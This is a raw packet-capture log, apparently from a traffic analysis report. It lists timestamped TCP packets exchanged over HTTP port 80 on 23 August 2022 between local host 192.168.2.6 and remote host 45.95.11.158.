                                                                                                                                                                      Aug 23, 2022 18:26:31.370237112 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.370282888 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.370287895 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.370318890 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.370337963 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.370372057 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.370373011 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.370421886 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.370429993 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.370474100 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.370480061 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.370510101 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.370529890 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.370563030 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.370605946 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.370663881 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.370695114 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.370739937 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.370757103 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.370779991 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.370795965 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.370835066 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.370836020 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.370882034 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.370889902 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.370935917 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.370938063 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.370971918 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.370992899 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.371025085 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.371098995 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.371145010 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.371160984 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.371202946 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.371202946 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.371241093 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.371285915 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.371296883 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.371638060 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.371699095 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.371710062 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.371752977 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.371757984 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.371790886 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.371813059 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.371848106 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.371989012 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.372037888 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.372052908 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.372088909 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.372128010 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.372145891 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.372195005 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.372205019 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.372663021 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.372714996 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.372730017 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.372771025 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.372771025 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.372807026 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.372822046 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.372860909 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.384881973 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.384928942 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.384960890 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.384987116 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.384988070 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.385039091 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.385041952 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.385092020 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.385092974 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.385143042 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.385145903 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.385183096 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.385196924 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.385235071 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.385236979 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.385288000 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.385289907 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.385343075 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.385344028 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.385394096 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.385395050 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.385446072 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.385445118 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.385499001 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.385499001 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.385531902 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.385555983 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.385588884 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.385590076 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.385633945 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.385667086 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.385689020 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.385693073 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.385730982 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.385746956 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.385786057 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.385802031 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.385838985 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.385848999 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.385899067 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.385900974 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.385932922 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.385952950 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.385982037 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.385988951 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.386038065 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.386039972 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.386090994 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.386091948 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.386126041 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.386143923 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.386183023 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.386185884 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.386234999 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.386236906 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.386286974 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.386287928 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.386322021 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.386338949 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.386373043 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.386375904 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.386426926 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.386428118 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.386476994 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.386481047 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.386516094 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.386533976 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.386565924 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.386568069 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.386617899 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.386620045 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.386671066 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.386672020 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.386703968 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.386720896 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.386755943 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.389360905 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.389404058 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.389444113 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.389461040 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.389503002 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.389513016 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.389518023 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.389566898 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.389566898 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.389620066 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.389622927 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.389662027 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.389806986 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.389851093 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.399488926 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.399538040 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.399564981 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.399590015 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.399602890 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.399627924 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.399631977 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.399652958 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.399668932 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.399672031 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.399702072 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.399713993 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.399738073 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.399749041 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.399775028 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.399784088 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.399811983 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.399821997 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.399838924 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.399857998 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.399876118 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.399879932 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.399908066 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.399920940 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.399944067 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.399952888 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.399972916 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.399991035 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.400018930 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.400480032 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.400541067 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.400619984 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.400650024 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.400671959 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.400676966 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.400696039 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.400712967 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.400726080 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.400749922 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.400758982 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.400789976 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.400799990 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.400815964 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.400841951 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.400854111 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.400857925 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.400887966 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.400902033 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.400922060 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.400937080 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.400948048 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.400969982 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.400985003 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.400995970 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.401020050 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.401041985 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.401055098 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.401070118 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.401081085 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.401099920 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.401118994 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.401123047 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.401154041 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.401170969 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.401194096 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.401201010 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.401220083 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.401240110 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.401257992 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.401263952 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.401292086 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.401310921 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.401328087 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.401340008 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.401351929 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.401376009 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.401392937 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.401393890 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.401424885 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.401437998 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.401459932 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.401472092 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.401484966 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.401508093 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.401547909 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.402522087 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.402582884 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.402596951 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.402632952 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.402643919 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.402657986 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.402678013 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.402703047 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.407161951 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.407188892 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.407206059 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.407218933 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.407242060 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.407272100 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.418580055 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.418612957 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.418629885 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.418646097 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.418665886 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.418688059 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.418699026 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.418706894 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.418719053 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.418729067 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.418730021 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.418754101 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.418756962 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.418777943 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.418786049 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.418796062 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.418806076 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.418817997 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.418819904 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.418838024 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.418847084 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.418864965 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.418875933 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.418898106 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.418904066 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.418921947 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.418921947 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.418939114 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.418950081 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.418968916 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.418976068 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.418991089 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.418998957 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.419028044 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.419039011 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.419070005 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.419091940 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.419126034 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.419130087 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.419141054 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.419142962 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:31.419177055 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:31.419356108 CEST4980080192.168.2.645.95.11.158
